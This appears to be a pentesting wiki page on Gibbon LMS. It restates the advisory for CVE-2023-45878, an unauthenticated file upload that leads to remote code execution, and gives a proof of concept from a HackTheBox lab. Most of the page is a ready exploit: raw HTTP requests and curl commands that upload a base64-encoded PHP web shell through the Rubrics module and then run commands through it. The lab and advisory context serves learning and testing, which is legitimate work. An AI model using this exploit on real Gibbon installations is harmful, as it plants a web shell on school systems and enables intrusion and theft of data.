Skip to content

Pentesting Gibbon LMS

Gibbon Edu is an open-source educational software designed for schools and institutions to manage their administrative and academic processes . It offers a range of features to facilitate communication, collaboration, and organization within the educational community.

Well known vulnerabilities

Version 25.0.01: unregistered arbitrary upload leading to remote code execution

HackTheBox machine: The Frizz.

Source: https://herolab.usd.de/security-advisories/usd-2023-0025/

Advisory ID: usd-2023-0025
Product: Gibbon (https://gibbonedu.org/)
Affected Version: 25.0.01 (before commit '226d83568cf3d447c4d86d4e5aba2c6e6289045d')
Vulnerability Type: CWE-434: Arbitrary File Write
Security Risk: Critical
Vendor URLhttps://gibbonedu.org
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed
CVE Number: CVE-2023-45878
CVE Linkhttps://nvd.nist.gov/vuln/detail/CVE-2023-45878

Description: Unauthenticated attackers can upload arbitrary files to the application and receive code execution on the underlying system.To receive RCE an attacker must craft a fake image which can be stored as PHP file.

POC (from HackTheBox machine The Frizz):

The Rubrics module has a file rubrics_visualise_saveAjax.php (source )which can be accessed without being authenticated. The file accepts the img, path and gibbonPersonID as POST parameters. The payload must be base64 encoded seperated by ; and , characters.

Upload:

1
2
3
4
5
6
7
8
9
POST /Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php HTTP/1.1
Host: frizzdc.frizz.htb
User-Agent: Mozilla/5.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 107

img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4K&path=lala.php&gibbonPersonID=0000000001

Trigger:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
GET /Gibbon-LMS/lala.php?cmd=whoami HTTP/1.1
Host: frizzdc.frizz.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Cookie: G60fa1cd0af7be78b=kf7gpbsht6raqise6sogin25uq
Upgrade-Insecure-Requests: 1

With curl:

Upload:

1
2
3
4
5
6
curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php" \
-H "Host: frizzdc.frizz.htb" \
--data-urlencode "img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4K" \
--data-urlencode "path=lele.php" \
--data-urlencode "gibbonPersonID=0000000001"
lele.php

Trigger:

1
curl http://frizzdc.frizz.htb/Gibbon-LMS/lele.php?cmd=whoami
Last update: 2025-09-03
Created: September 3, 2025 20:21:24